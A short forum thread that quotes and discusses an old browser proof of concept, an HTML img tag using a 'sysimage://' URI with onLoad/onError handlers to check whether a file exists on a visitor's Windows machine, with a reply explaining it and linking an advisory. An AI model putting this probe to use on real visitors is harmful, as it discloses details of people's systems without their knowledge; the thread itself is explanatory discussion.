"sysimage://" protocol

R

Richard

Jan said:
I don't undestand this ^^^^
<blockquote
site="http://www.securityfocus.com/archive/1/383622/2004-12-06/2004-12-12
/0"> Proof Of Concept
================
<img src="sysimage://C:\WINNT\Notepad.exe,666"
onLoad="document.write('<b>Cannot Find File!</b>');"
onError="document.write('<b>File Exists!</b>');">
</blockquote>
onError => File Exists?

Apparently testing to see if his scheme works or not.
He's looking at "your" computer's files to see if you have notepad or not.
But for some reason, his thinking is backwards.

http://secunia.com/advisories/13396/
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

No members online now.

Forum statistics

Threads
473,744
Messages
2,569,483
Members
44,903
Latest member
orderPeak8CBDGummies

Latest Threads

Top